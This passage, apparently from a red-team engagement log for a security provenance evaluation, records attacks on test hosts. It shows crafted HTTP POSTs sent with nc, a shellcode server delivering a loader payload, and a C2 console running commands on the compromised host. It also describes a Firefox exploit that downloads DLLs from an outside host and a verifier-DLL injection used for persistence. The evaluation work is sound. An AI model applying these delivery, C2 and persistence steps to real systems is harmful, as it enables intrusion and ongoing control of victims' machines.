        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca75  | nc 128.55.12.75 80                                                                                                                                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD831E" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C1F18" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1461A5AD" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Thu, 16 May 2019 13:31:45 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D9C0B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7FC54" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F981469" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853C2AE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40607270" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F131BD0" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1ECE55" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE6F90" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6ADB9B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D777931" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_kl1h27mgvdq2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7102E7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098910F1" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca51  | nc 128.55.12.51 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5BA9CA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DAC15" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F8B94" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Thu, 16 May 2019 13:33:02 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A8077" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF0496" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEFC089" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA43FF" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF9422" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1872B7FE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0409445F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290B3B8" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344B976D" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCF48F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_b4mjjm9t8251" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3EE21F" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0075A6BE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca75  | nc 128.55.12.75 80    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A7495" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A73C64" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets# python shellcode_server.py loaderDrakon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C49979" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Serving: loaderDrakon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940AC4C" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311EA478" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>listening at address unknown on port 8117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9866A8" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A73DC9" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [16/May/2019 09:35:19] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9FA25" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE4B24" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495548E" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x3D697 (251543) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9B96E" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EAB95BD" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C5943" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca75  | nc 128.55.12.75 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541944DE" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6873D735" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13EEEF" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [16/May/2019 09:36:27] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC22920" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0BCD2" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68487211" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>writing 0x3D697 (251543) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CF5B4" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_yscj8kgbg8yu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297ADA13" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9:59AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690CE304" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kududyn-ProLiant-SL170s-G6:/e5/oc2_cadets# python ocMain.py --http 8118</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E01AC" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D42E891" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0EEA6" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42302654" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B3E0E" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8118  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C87B40" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D09C4" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DC4A91" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19257685" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [freebsd] [x64] [FreeBSD 13.0-CURRENT 1c54f81b39(HEAD) CADETS] [13.0-CURRENT]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D408317" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new freebsd console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF1DABA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [F1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60F573" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B51B7D" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC54AA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1        128.55.12.167:46905 --&gt;   128.55.12.167:8118  [HTTP]  Thu May 16 09:59:23 2019        active 6s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878D7D3" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC79DD" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC06AC" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8EA33" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653D67B7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0B25D" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E87A6A7" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] uid: 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55111ABA" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3B250B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408D7CF" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BFE9B" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68737B6A" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31527C22" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4470EA09" w14:textId="77777777" w:rsidR="00781848" w:rsidRDefault="00781848" w:rsidP="00781848">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461FCC7B" w14:textId="3E9B4AC1" w:rsidR="00CE2C66" w:rsidRPr="00650FDF" w:rsidRDefault="00781848" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>^C[-] C</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t>onnection lost for console [F1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5B593" w14:textId="620F9DB6" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc12600104"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>11:03 -- Five Directions 1 -- Firefox BITS Verifier Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="3AA3C070" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tried multiple times to exploit the browser and use BITS to download and run the verifier executable.  This was done by browsing to http://215.237.119.171/config.html.  At this point, Firefox should have connected out to 68.149.51.179 to download and execute dbgstat.dll and tester.exe.  We think the files were downloaded but not executed, although we could find no instance of the files on disk where we would expect them.  Instead, we scp’ed the files to the target and ran them using an Administrator command prompt.  Tester.exe (verifier) opened dbgstat.dll (drakon.dll) and registered it as a verifier DLL for Firefox in the Windows registry.  The result is that every time a new Firefox process is started, drakon.dll is injected into it automatically and executed.  We configured the OC2 to automatically run the same script each time a new connection was received, including hostname, whoami, and ps.  We left the drakon.dll verifier enabled throughout the remaining engagement, resulting in 126 drakon instances and C2 connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63910429" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The OC2 command script stopped working 100% after connection W10, working partially for some connections and not at all for others.  Not sure exactly what happened but it’s possible the browser had slowed down to the point where drakon was unable to run any commands before benign activity closed the browser.  There were noticeable performance issues with Firefox on FiveDirections during this test, and the benign activity would not have taken this into account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AE254" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A4CD60" w14:textId="4D5991CA" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The TA1 Five Directions attack consisted of the host browsing to the malicious website </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00FC027E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          </w:rPr>
          <w:t>http://215.237.119.171/config.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
